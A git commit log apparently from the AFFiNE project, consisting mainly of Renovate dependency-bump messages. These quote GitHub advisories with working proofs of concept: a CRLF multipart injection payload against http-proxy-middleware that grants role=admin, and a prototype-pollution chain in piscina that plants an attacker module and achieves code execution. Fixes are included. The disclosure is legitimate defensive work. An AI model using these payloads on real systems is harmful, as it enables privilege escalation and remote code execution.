checks (demonstrated below: a gateway that forbids `role=admin` is
bypassed; backend grants admin).
- **Parameter tampering:** add or overwrite fields the backend trusts
(IDs, flags, prices).
- **File-part injection:** inject a `filename="..."` part into the
upstream multipart stream.

##### Proof of Concept

```js
// npm i http-proxy-middleware@4.0.0   (Node ESM: save as minimal.mjs)
import { fixRequestBody } from 'http-proxy-middleware';

// `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it.
// The attacker sent  user=alice%0D%0A--BB%0D%0A...  so this ONE field's value holds CRLF:
const req = { readableLength: 0, body: {
  user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--'
}};

// Minimal stand-in for the outgoing proxy request; capture what gets written.
const out = [];
const proxyReq = {
  h: { 'content-type': 'multipart/form-data; boundary=BB' },
  getHeader(n){ return this.h[n.toLowerCase()]; },
  setHeader(n,v){ this.h[n.toLowerCase()] = v; },
  write(d){ out.push(Buffer.from(d)); },
};

fixRequestBody(proxyReq, req);          // library rebuilds the multipart body
console.log(Buffer.concat(out).toString());
```

Output: one input field becomes **two** parts; `role=admin` was injected
via the unescaped CRLF:

```
--BB
Content-Disposition: form-data; name="user"

alice
--BB
Content-Disposition: form-data; name="role"     <-- injected part; never present in req.body's keys

admin
--BB--
```

`req.body` had a single key (`user`), so any gateway policy checking
`req.body.role` passes, yet the backend's multipart parser receives
`role=admin`. On the wire the attacker simply sends, as
`application/x-www-form-urlencoded`:
`user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--`

##### Remediation
Neutralize CR/LF (and `"`) in keys/values before interpolation, or build
the body with a real multipart encoder (e.g. `FormData` / `form-data`)
instead of string concatenation. Minimal fix:

```js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  const bad = /[\r\n]/;
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    const v = String(value);
    if (bad.test(key) || bad.test(v)) {
      throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value');
    }
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`;
  }
  return str;
}
```
(Reject is preferable to silent stripping, to avoid masking malicious
input.)
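
An application that cannot upgrade immediately could apply the same reject-on-CR/LF idea on the gateway side, before the request is proxied. The helper below is a hypothetical sketch, not part of `http-proxy-middleware`; it only inspects top-level keys and values of a flat `req.body` and stringifies anything that is not already a string.

```javascript
// Hypothetical gateway-side check: list the body fields whose key or value
// contains a carriage return or line feed.
function findCrlfFields(body) {
    const bad = /[\r\n]/;
    return Object.entries(body || {})
        .filter(([key, value]) => bad.test(key) || bad.test(String(value)))
        .map(([key]) => key);
}

const suspicious = findCrlfFields({
    user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--',
    note: 'plain value'
});
console.log(suspicious);                        // [ 'user' ]
console.log(findCrlfFields({ user: 'alice' })); // []
```

In an Express-style handler, a non-empty result could be answered with a 400 response before the proxy middleware runs. Nested objects and arrays would need a recursive walk, which this sketch omits.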

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N`

#### References
-
[https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm)
-
[https://github.com/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>chimurai/http-proxy-middleware
(http-proxy-middleware)</summary>

###
[`v3.0.7`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.7)

[Compare
Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7)

#### What's Changed

- fix(fixRequestBody): harden form-data stringification by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1259](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1259)
- chore(package.json): v3.0.7 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1261](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1261)

**Full Changelog**:
<https://github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7>

###
[`v3.0.6`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.6)

[Compare
Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6)

#### What's Changed

- fix(types): fix Logger type by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1104](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1104)
- fix(fixRequestBody): support text/plain by
[@&#8203;knudtty](https://redirect.github.com/knudtty) in
[#&#8203;1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- chore(examples): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1105](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1105)
- build(prettier): improve prettier setup by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1108](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1108)
- chore(deps): fix punycode node deprecation warning by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1109](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1109)
- chore(examples): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1110](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1110)
- build(codespaces): add devcontainer.json by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1112](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1112)
- chore(package): bump dev dependencies by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1116](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1116)
- ci(github-action): ci.yml add node v24 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1117](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1117)
- chore(package): bump dev dependencies by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1118](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1118)
- chore(package): upgrade to jest v30 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1122](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1122)
- chore(examples): upgrade deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1124](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1124)
- chore(package): update dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1125](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1125)
- test(websocket): fix ws import by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1126](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1126)
- chore(refactor): use `node:` protocol imports by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1127](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1127)
- ci(node24): pin node24 due to TLS issue with mockttp by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1137](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1137)
- docs(recipes/pathRewrite.md): fix comment by
[@&#8203;DEBargha2004](https://redirect.github.com/DEBargha2004) in
[#&#8203;1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- chore(package): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1138](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1138)
- chore(deps): update actions/checkout action to v5 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1140](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1140)
- fix(error-response-plugin): sanitize input by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1141](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1141)
- chore(package.json): update dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1143](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1143)
- chore: add context7.json by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1144](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1144)
- build(eslint): update eslint.config.mjs by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1145](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1145)
- ci(github workflow): harden github workflows by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1146](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1146)
- chore(package): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1147](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1147)
- ci(ci.yml): unpin node 24 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1148](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1148)
- docs(recipes): fix servers.md http.createServer example by
[@&#8203;hacklschorsch](https://redirect.github.com/hacklschorsch) in
[#&#8203;1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150)
- ci: publish with oidc by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1152](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1152)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1153](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1153)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1155](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1155)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1158](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1158)
- test(types.spec.ts): add type check when req or res are 'any' by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1161](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1161)
- chore(package.json): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1164](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1164)
- chore(package.json): eslint v10 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1165](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1165)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1166](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1166)
- chore(package.json): bump dev-deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1171](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1171)
- docs(examples): fix websocket example by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1170](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1170)
- build(vscode): use workspace version of TypeScript by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1173](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1173)
- fix(router): harden proxy-table matching by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1254](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1254)
- chore(package.json): v3.0.6 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1256](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1256)

#### New Contributors

- [@&#8203;knudtty](https://redirect.github.com/knudtty) made their
first contribution in
[#&#8203;1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- [@&#8203;DEBargha2004](https://redirect.github.com/DEBargha2004) made
their first contribution in
[#&#8203;1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- [@&#8203;hacklschorsch](https://redirect.github.com/hacklschorsch)
made their first contribution in
[#&#8203;1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150)

**Full Changelog**:
<https://github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 12:18:31 +08:00
renovate[bot] 9a9f243966 chore: bump up piscina version to v5.2.0 [SECURITY] (#15132)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [piscina](https://redirect.github.com/piscinajs/piscina) | [`5.1.4` →
`5.2.0`](https://renovatebot.com/diffs/npm/piscina/5.1.4/5.2.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/piscina/5.2.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/piscina/5.1.4/5.2.0?slim=true)
|

---

### piscina: Prototype Pollution Gadget → RCE via inherited
options.filename
[CVE-2026-55388](https://nvd.nist.gov/vuln/detail/CVE-2026-55388) /
[GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg)

<details>
<summary>More information</summary>

#### Details
##### Summary

`piscina`'s constructor and `run()` paths read the `filename` option via
plain member access:

```js
// dist/index.js line 92 (constructor)
const filename = options.filename
  ? (0, common_1.maybeFileURLToPath)(options.filename)
  : null;
this.options = { ...kDefaultOptions, ...options, filename, maxQueue: 0 };

// dist/index.js line 616 (run())
run(task, options = kDefaultRunOptions) {
    if (options === null || typeof options !== 'object') {
        return Promise.reject(new TypeError('options must be an object'));
    }
    const { transferList, filename, name, signal } = options;
```

Both reads fall through the prototype chain when the caller's options
object doesn't have `filename` as an own property. When
`Object.prototype.filename` is polluted upstream — by any of the
well-documented PP-source CVEs (lodash<4.17.13, qs<6.10.3,
set-value<4.1.0, minimist<1.2.6, deepmerge<4.2.2, and others) — the
inherited value flows to `worker_threads.Worker` import and the
attacker's `.mjs` runs in the worker.

**Subtlety**: calling `pool.run(task)` with no second arg uses
`kDefaultRunOptions` which has `filename: null` as an OWN property —
that path DOES NOT fire. The vulnerable shape is when the caller passes
their own options object (commonly `{signal: ac.signal}` for abort
support, `{name: ...}` for task labelling, etc.). These caller-built
options objects inherit from `Object.prototype` unless the caller
explicitly uses `Object.create(null)`.
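
The difference between an own property and an inherited one can be sketched in isolation. The snippet below is a minimal illustration, not piscina's code: `defaultRunOptions` and `callerOptions` are hypothetical stand-ins for the shapes described above, and the pollution is simulated directly and undone afterwards.

```js
// Stand-in for defaults that carry `filename: null` as an OWN property.
const defaultRunOptions = { filename: null };

// Simulate an upstream prototype-pollution source (demonstration only).
Object.prototype.filename = '/tmp/atk.mjs';

// A typical caller-built options object with no own `filename`.
const callerOptions = { name: 'resize' };

// Destructuring (like plain member access) walks the prototype chain.
const { filename: inherited } = callerOptions;

// An own property shadows the polluted prototype value.
const { filename: shadowed } = defaultRunOptions;

// Copying into a null-prototype object keeps own enumerable keys only.
const nullProto = Object.assign(Object.create(null), callerOptions);

// An explicit own-property guard also ignores inherited values.
const guarded = Object.hasOwn(callerOptions, 'filename')
  ? callerOptions.filename
  : null;

// Undo the simulated pollution before doing anything else.
delete Object.prototype.filename;

console.log({ inherited, shadowed, fromNullProto: nullProto.filename, guarded });
```

Only the first read picks up the polluted value; the other three are unaffected, which matches the distinction drawn above between the default options and caller-built options.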

##### Impact

Two preconditions:

1. **Upstream PP-source** somewhere in the process — common in
transitive deps
2. **Attacker-controllable `.mjs`** at a known filesystem path —
realistic via upload endpoints, /tmp races, predictable node_modules
paths, or supply-chain

Once both fire:
- Every `pool.run(task, opts)` call across the entire process is
hijacked
- Attacker's exported function is called with the legitimate caller's
task data — **attacker reads per-request app data**
- Attacker controls the return value — caller receives
`worker_response.by = "ATTACKER-WORKER"` and any other attacker-supplied
response fields — **attacker can poison return values to legitimate
clients**
- Hijack persists until process restart

Strictly worse than the analogous pino chain because piscina actually
*invokes* the attacker function with caller data on every dispatch (pino
imports the attacker module once and errors out).

##### Affected versions

Empirically verified vulnerable on `piscina@5.1.4` (latest stable at
time of disclosure). The bug shape is in the constructor's
`options.filename` read at line 92 of `dist/index.js`, present since the
worker-pool API stabilized — likely all 3.x / 4.x / 5.x affected.

##### Proof of concept

##### A) Minimal in-process PoC

```js
import fs from 'fs';

// 1) Drop the attacker module (any path the victim process can read)
fs.writeFileSync('/tmp/atk.mjs', `
  import fs from 'fs';
  fs.writeFileSync('/tmp/PISCINA_RCE_SENTINEL', JSON.stringify({
    rce: 'CONFIRMED', pid: process.pid, argv1: process.argv[1],
  }));
  export default function(arg) { return 'attacker-return-' + JSON.stringify(arg); }
`);

// 2) Upstream PP-source — pollute Object.prototype.filename
//    (representative of CVE-2019-10744 lodash<4.17.13, CVE-2022-24999 qs<6.10.3,
//     and ~30 historical PP-source CVEs)
const payload = JSON.parse('{"__proto__":{"filename":"/tmp/atk.mjs"}}');
function vulnMerge(t, s) {
  for (const k of Object.keys(s)) {
    if (s[k] !== null && typeof s[k] === 'object') {
      if (!t[k]) t[k] = {};
      vulnMerge(t[k], s[k]);
    } else t[k] = s[k];
  }
}
vulnMerge({}, payload);

// 3) Piscina with empty options inherits the polluted filename
const { Piscina } = await import('piscina');
const p = new Piscina({});                        // inherits filename
const result = await p.run({});                   // worker imports /tmp/atk.mjs
await p.destroy();

// 4) sentinel exists; attacker fn was called with task data
console.log(fs.readFileSync('/tmp/PISCINA_RCE_SENTINEL', 'utf8'));
console.log('attacker fn returned:', result);
// → "attacker-return-{}"
```

##### B) Full-stack HTTP chain (this is the realistic shape)

A correctly-initialized pool gets hijacked by attacker activity. Pool is
created at server boot with a legitimate worker, then per-request
handlers call `pool.run(req.body, {signal: ac.signal})` — the standard
abort-aware shape.

```js
// === server.mjs ===
import express from 'express';
import { Piscina } from 'piscina';

// Vulnerable PP-source middleware (lodash<4.17.13 equivalent)
function vulnMerge(t, s) {
  for (const k of Object.keys(s)) {
    if (s[k] !== null && typeof s[k] === 'object') {
      if (!t[k]) t[k] = {};
      vulnMerge(t[k], s[k]);
    } else t[k] = s[k];
  }
}

// CORRECT pool init at boot
const pool = new Piscina({
  filename: './valid-worker.mjs',
  minThreads: 1, maxThreads: 2,
});

const config = {};
const app = express();

app.post('/api/settings', express.json(), (req, res) => {
  vulnMerge(config, req.body);                    // PP source
  res.json({ ok: true });
});

app.post('/api/process', express.json(), async (req, res) => {
  const ac = new AbortController();
  const result = await pool.run(req.body, { signal: ac.signal });  // <-- hijacked
  res.json({ ok: true, worker_response: result });
});

app.listen(7755);

// === Attacker, 3 HTTP requests ===
// POST /upload  → drops /tmp/atk.mjs
// POST /api/settings with body: {"__proto__":{"filename":"/tmp/atk.mjs"}}
// POST /api/process → pool.run() destructures filename via prototype
//                  → worker imports /tmp/atk.mjs
//                  → attacker fn called with req.body of THIS request
//                  → caller receives attacker-shaped response
```

Empirical observation on `piscina@5.1.4` + Node 23.11.0:
- Pre-attack `/api/process` returns `{by: 'valid-worker'}`
- Cold-path `/probe` after PP source confirms `({}).filename` is
polluted process-wide
- Post-attack `/api/process` returns `{by: 'ATTACKER-WORKER', processed:
<caller's exfil data>}`
- Sentinel file written from inside `piscina/dist/worker.js` with the
worker process's uid + env access

##### Recommended fix

Minimal — own-property guard at both option-read sites:

```js
// constructor (line 92)
const userFilename = Object.prototype.hasOwnProperty.call(options, 'filename')
  ? options.filename
  : null;
const filename = userFilename
  ? (0, common_1.maybeFileURLToPath)(userFilename)
  : null;

// run() (line 616)
const safeOpts = Object.create(null);
Object.assign(safeOpts, options);          // copies own enumerable props only; inherited keys are dropped
const { transferList, filename, name, signal } = safeOpts;
```

More idiomatic — use a null-prototype working object throughout
`this.options`:

```js
const safeOpts = Object.create(null);
Object.assign(safeOpts, kDefaultOptions, options);
this.options = safeOpts;
this.options.filename = safeOpts.filename
  ? (0, common_1.maybeFileURLToPath)(safeOpts.filename)
  : null;
this.options.maxQueue = 0;
```

Either approach closes the gadget without breaking any legitimate caller
pattern.

The pattern is the same as recommended for axios CVE-2026-44494 and the
pino PSA filed earlier today. Cross-fix consideration: any other library
you maintain that uses similar `options.X` member-access for worker /
child-process / module-load operations is worth a quick audit.

##### Coordination

- Same maintainer as pino — you're already in security-triage mode for
that PSA. Happy to coordinate timing / disclosure dates across both.
- Will not share publicly until GHSA published or 90 days.
- Please credit `ridingsa` if you choose to credit a reporter.

##### How this was discovered

Generalized the pino disclosure's mechanism — any library that reads a
string option via plain member access and dynamic-loads it (via
`import()` / `require()` / `new Worker()`) is a candidate. Ran a sweep
across 10 candidate libraries; piscina + fastify (via pino propagation)
fired. Piscina is independently vulnerable through its own option-read
sites, hence this separate disclosure.

#### Severity
- CVSS Score: 8.1 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`

#### References
-
[https://github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg)
-
[https://github.com/advisories/GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>piscinajs/piscina (piscina)</summary>

###
[`v5.2.0`](https://redirect.github.com/piscinajs/piscina/compare/v5.1.4...v5.2.0)

[Compare
Source](https://redirect.github.com/piscinajs/piscina/compare/v5.1.4...v5.2.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 12:18:17 +08:00
Tines Valen e2624d93c7 fix(core): filters emojipicker on label in addition to tags (#15129)
Fixes #15116
# Issue
The emoji picker's keyword filter matched only on `tags`, not on `label`,
so searching for an emoji by name did not return it. For example,
searching "sunflower" did not show 🌻.

# Solution
Add an extra condition to the filter function that checks whether the
keyword is a substring of the emoji's label.

# Result
Search results now include emojis whose `label` matches the keyword.
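
A minimal sketch of the label-plus-tags filter described above. The record shape (`emoji`, `label`, `tags`), the sample data, and the `filterEmojis` name are assumptions made for illustration, not the picker's actual code; tag matching is assumed to be a case-insensitive substring check as well.

```js
// Hypothetical emoji records; the real picker data may be shaped differently.
const emojis = [
  { emoji: '🌻', label: 'sunflower', tags: ['flower', 'sun', 'plant'] },
  { emoji: '🌹', label: 'rose', tags: ['flower', 'love'] },
  { emoji: '☀️', label: 'sun', tags: ['bright', 'weather'] },
];

// Keep an emoji when the keyword is a substring of its label OR of any tag.
function filterEmojis(list, keyword) {
  const needle = keyword.trim().toLowerCase();
  if (!needle) return list; // empty search shows everything
  return list.filter(({ label = '', tags = [] }) =>
    label.toLowerCase().includes(needle) ||
    tags.some(tag => tag.toLowerCase().includes(needle))
  );
}

const bySunflower = filterEmojis(emojis, 'Sunflower').map(e => e.emoji);
const bySun = filterEmojis(emojis, 'sun').map(e => e.emoji);
console.log(bySunflower, bySun);
```

With a tags-only filter, "sunflower" would match nothing in this sample data because no single tag contains the whole word; the label check is what brings 🌻 back.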

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Improved emoji picker search to include matches on both emoji labels
and tags (case-insensitive), enabling broader search results for better
discoverability.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-18 22:07:27 +08:00
renovate[bot] 766219d4e1 chore: bump up nestjs to v11.1.27 (#15130)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.24` →
`11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.24/11.1.27)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.27?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.24/11.1.27?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.24` →
`11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.24/11.1.27)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.27?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.24/11.1.27?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.24` →
`11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.24/11.1.27)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.27?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.24/11.1.27?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.24` →
`11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.24/11.1.27)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.27?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.24/11.1.27?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.24` →
`11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.24/11.1.27)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.27?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.24/11.1.27?slim=true)
|

---

> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency
Dashboard](../issues/5188) for more information.

---

### Release Notes

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.27`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.27)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.26...v11.1.27)

#### What's Changed

- fix(core): sse async handlers teardown issue by
[@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in
[#&#8203;17131](https://redirect.github.com/nestjs/nest/pull/17131)
- fix(platform-fastify): forRoutes middleware ending slash by
[@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in
[#&#8203;17138](https://redirect.github.com/nestjs/nest/pull/17138)

**Full Changelog**:
<https://github.com/nestjs/nest/compare/v11.1.26...v11.1.27>

###
[`v11.1.26`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.26)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.25...v11.1.26)

#### What's Changed

- fix(core): post sse endpoint empty response
[#&#8203;17098](https://redirect.github.com/nestjs/nest/issues/17098) by
[@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in
[#&#8203;17099](https://redirect.github.com/nestjs/nest/pull/17099)

**Full Changelog**:
<https://github.com/nestjs/nest/compare/v11.1.25...v11.1.26>

###
[`v11.1.25`](https://redirect.github.com/nestjs/nest/compare/v11.1.24...02f804159841a2771755c382832a7938b904c420)

[Compare
